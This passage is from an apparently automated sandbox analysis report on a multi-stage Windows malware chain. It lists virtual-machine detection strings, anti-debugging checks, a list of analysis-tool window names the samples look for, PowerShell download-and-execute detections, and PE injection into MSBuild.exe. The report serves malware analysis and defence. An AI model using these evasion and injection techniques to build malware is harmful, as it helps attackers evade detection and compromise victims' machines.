Source: ae70ca0159.exe, ae70ca0159.exe, 0000001F.00000002.2551105374.00000000013CD000.00000040.00000001.01000000.0000000A.sdmp, 5a4a47dccd.exe, 5a4a47dccd.exe, 00000021.00000002.2564796666.00000000005F7000.00000040.00000001.01000000.00000014.sdmp, PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2643878784.00000000004DD000.00000040.00000001.01000000.00000016.sdmp, FQZHGI4TELUEK712J739LWFDT7.exe, 00000029.00000002.2681320783.0000000000D4E000.00000040.00000001.01000000.00000018.sdmp, ae70ca0159.exe, 0000002A.00000002.2832307852.00000000013CD000.00000040.00000001.01000000.0000000A.sdmp, Fe36XBk.exe, 00000038.00000002.3023050482.00000000005FF000.00000040.00000001.01000000.0000001D.sdmp, 8b3fbc1053.exe, 00000039.00000002.3076272452.0000000000601000.00000040.00000001.01000000.0000001E.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ae70ca0159.exe, 00000008.00000002.2337888063.00000000019F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWv
Source: cmd.exe, 0000002D.00000003.2764497191.0000000002E79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWW
Source: random.exe, 00000000.00000003.1715230563.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Macromedia.com, 00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: 487dac876e.exe, 00000009.00000002.2347265237.0000000000546000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: ae70ca0159.exe, 00000008.00000002.2337888063.000000000197E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware_
Source: wscript.exe, 00000035.00000002.2952399919.000002B57D1F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}A
Source: wscript.exe, 00000035.00000002.2952399919.000002B57D1F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\P
Source: ae70ca0159.exe, 0000001F.00000002.2552036378.000000000193B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware-W
Source: wscript.exe, 00000035.00000002.2950775349.000002B57D1E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]*
Source: dfd80aba08.exe, 00000007.00000003.2253551452.0000000001545000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 00000008.00000002.2337888063.00000000019C7000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 00000008.00000002.2337888063.00000000019F3000.00000004.00000020.00020000.00000000.sdmp, e2b0a87ceb.exe, 00000017.00000002.2610627222.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000001F.00000002.2552036378.00000000019A7000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000001F.00000002.2552036378.000000000197A000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2852645964.0000000001154000.00000004.00000020.00020000.00000000.sdmp, PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014D3000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000002A.00000002.2868868289.00000000018A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ae70ca0159.exe, 0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: random.exe, 00000000.00000002.1755561558.000000000083E000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1778306747.0000000000CAE000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1795697231.0000000000CAE000.00000040.00000001.01000000.00000007.sdmp, ae70ca0159.exe, 00000008.00000002.2336822937.00000000013CD000.00000040.00000001.01000000.0000000A.sdmp, ae70ca0159.exe, 0000001F.00000002.2551105374.00000000013CD000.00000040.00000001.01000000.0000000A.sdmp, 5a4a47dccd.exe, 00000021.00000002.2564796666.00000000005F7000.00000040.00000001.01000000.00000014.sdmp, PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2643878784.00000000004DD000.00000040.00000001.01000000.00000016.sdmp, FQZHGI4TELUEK712J739LWFDT7.exe, 00000029.00000002.2681320783.0000000000D4E000.00000040.00000001.01000000.00000018.sdmp, ae70ca0159.exe, 0000002A.00000002.2832307852.00000000013CD000.00000040.00000001.01000000.0000000A.sdmp, Fe36XBk.exe, 00000038.00000002.3023050482.00000000005FF000.00000040.00000001.01000000.0000001D.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 5a4a47dccd.exe, 00000021.00000002.2674793843.000000000519E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: K,<=;;?9:VMcI;8
Source: dfd80aba08.exe, 00000023.00000003.2852645964.0000000001154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW.8
Source: Macromedia.com, 00000016.00000003.3091574165.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: e2b0a87ceb.exe, 00000017.00000002.2610627222.0000000001580000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(z\
Source: e2b0a87ceb.exe, 00000017.00000002.2610627222.00000000015B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW#
Source: 7fOMOTQ.exe, 0000002C.00000003.3101072477.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2765671512.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.3072843233.0000000000C88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC

Source: C:\Users\user\Desktop\random.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\random.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_04D406CF Start: 04D406A9 End: 04D406A5		0_2_04D406CF
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_04D40689 Start: 04D406A9 End: 04D406A5		0_2_04D40689

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_04D40CD3 rdtsc

0_2_04D40CD3

Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe

Code function: 23_2_004431A0 LdrInitializeThunk,

23_2_004431A0

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe

Code function: 9_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

9_2_00406328

Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 21_2_02EF9875 mov edi, dword ptr fs:[00000030h]		21_2_02EF9875
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 21_2_02EF99F2 mov edi, dword ptr fs:[00000030h]		21_2_02EF99F2

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match	File source: amsi32_2916.amsi.csv, type: OTHER
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\b6V4Rod[1].ps1, type: DROPPED

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_6404.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: ae70ca0159.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ae70ca0159.exe PID: 1516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PAL947G2R107U02V5ZPL.exe PID: 2084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ae70ca0159.exe PID: 7160, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe

Code function: 21_2_02EF9875 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

21_2_02EF9875

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Memory written: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40000
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40064
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D400C8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4012C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40190
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D401F4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40258
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D402BC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40320
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40384
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D403E8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4044C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D404B0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40514
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40578
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D405DC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40640
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D406A4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40708
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4076C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D407D0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40834
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40898
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D408FC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40960
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D409C4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40A28
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40A8C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D40AF0
